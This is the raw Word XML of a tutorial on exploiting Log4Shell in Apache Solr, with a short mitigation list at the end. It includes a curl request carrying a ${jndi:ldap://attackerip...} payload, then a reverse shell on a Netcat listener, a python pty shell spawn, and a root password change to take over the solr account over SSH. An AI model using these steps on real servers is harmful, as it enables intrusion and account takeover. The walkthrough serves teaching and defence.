          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B10C81F" w14:textId="0029D0B4" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BED3A27" wp14:editId="7656EF5E">
            <wp:extent cx="5731510" cy="8032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803275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDA3ABB"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executing the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480C004F" w14:textId="51123E16" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76DCAC54" wp14:editId="456BBBD9">
            <wp:extent cx="5731510" cy="8096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809625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F74B184"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 xml:space="preserve">and create an exploit in java with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener and HTTP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACACE21" w14:textId="30EB4420" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ACBFB45" wp14:editId="08D6BBB2">
            <wp:extent cx="5731510" cy="6464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46430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21526BCE"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 xml:space="preserve">Now execute the HTTP, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> listeners, and LDAP service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FE90EE"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lastRenderedPageBreak/>
        <w:t>After that execute the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0AE529" w14:textId="279258C2" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E733725" wp14:editId="16B136DC">
            <wp:extent cx="5731510" cy="7219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721995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1306228D" w14:textId="3BEDA80C"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and again, execute send the malicious request to the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6827BA"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curl ‘</w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00C379B7">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>http://serviceip:8983/solr/admin/cores?foo=$</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>{jndi:ldap://attackerip:1389/Exploit}’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC906BA" w14:textId="1B5F2152" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35175F4F" wp14:editId="64DD5DAA">
            <wp:extent cx="5731510" cy="5670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67055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E13E6A8"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 xml:space="preserve">If everything goes well you will receive a reverse shell on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C84BA1D" w14:textId="407E5DD6" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CB01D82" wp14:editId="5923764D">
            <wp:extent cx="5731510" cy="13277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327785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE4A068"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Let us stabilize the shell or try to get a persistent shell using</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEAA6A0"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 xml:space="preserve">python -c ‘import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>(“/bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380710BB"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and check for permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0219B027" w14:textId="7C16EBF5" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B68ECD3" wp14:editId="5646FAF8">
            <wp:extent cx="5731510" cy="21196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119630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E876FF5"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From the following output, we infer that there are no restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDECECB" w14:textId="1985B673"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 xml:space="preserve">So, we will try to get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> user access by changing the password </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> user using root privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB0027C" w14:textId="396F4DBE" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33524A5F" wp14:editId="21544888">
            <wp:extent cx="414020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0200" cy="1295400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5C267D" w14:textId="77777777" w:rsidR="00C379B7" w:rsidRP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 xml:space="preserve">and now we </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133D6247" w14:textId="7002ABB9" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76FBF1C1" wp14:editId="5E8D5BAC">
            <wp:extent cx="5731510" cy="1220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220470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F0019B" w14:textId="19D8C81C" w:rsidR="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="48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That is how one can try to exploit this vulnerability. However, the exploitation is not limited as it may have many attack vectors. So better keep hustling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C818D0D" w14:textId="77777777" w:rsidR="00F7760E" w:rsidRPr="00C379B7" w:rsidRDefault="00F7760E" w:rsidP="00C379B7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="480" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767A598B" w14:textId="77777777" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="480" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="303030"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc91633674"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="303030"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mitigation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="4ECA1937" w14:textId="77777777" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="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Keep updating the service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A36263A" w14:textId="77777777" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Block exploits by implementing firewall and egress rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344293AF" w14:textId="77777777" w:rsidR="00BE79D3" w:rsidRDefault="00FF11F8"/>
    <w:sectPr w:rsidR="00BE79D3">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BB0B4" w14:textId="77777777" w:rsidR="00FF11F8" w:rsidRDefault="00FF11F8" w:rsidP="00431945">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5BFAADCC" w14:textId="77777777" w:rsidR="00FF11F8" w:rsidRDefault="00FF11F8" w:rsidP="00431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F58DE" w14:textId="77777777" w:rsidR="00431945" w:rsidRDefault="004319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790150"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="2329A844" w14:textId="77777777" w:rsidR="00431945" w:rsidRDefault="004319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D3521F" w14:textId="77777777" w:rsidR="00431945" w:rsidRDefault="004319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003AC" w14:textId="77777777" w:rsidR="00431945" w:rsidRDefault="004319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1CB37" w14:textId="77777777" w:rsidR="00FF11F8" w:rsidRDefault="00FF11F8" w:rsidP="00431945">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="55CBFA74" w14:textId="77777777" w:rsidR="00FF11F8" w:rsidRDefault="00FF11F8" w:rsidP="00431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11E4D" w14:textId="77777777" w:rsidR="00431945" w:rsidRDefault="004319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8DFC9" w14:textId="77777777" w:rsidR="00431945" w:rsidRDefault="004319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3CB2E" w14:textId="77777777" w:rsidR="00431945" w:rsidRDefault="004319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3502D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3A80C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EFE"/>
    <w:rsid w:val="00002460"/>
    <w:rsid w:val="001E39E3"/>
    <w:rsid w:val="00271EFE"/>
    <w:rsid w:val="00431945"/>
    <w:rsid w:val="006E2C98"/>
    <w:rsid w:val="00AD0201"/>
    <w:rsid w:val="00BA5333"/>
    <w:rsid w:val="00C379B7"/>
    <w:rsid w:val="00E848A6"/>
    <w:rsid w:val="00F7760E"/>
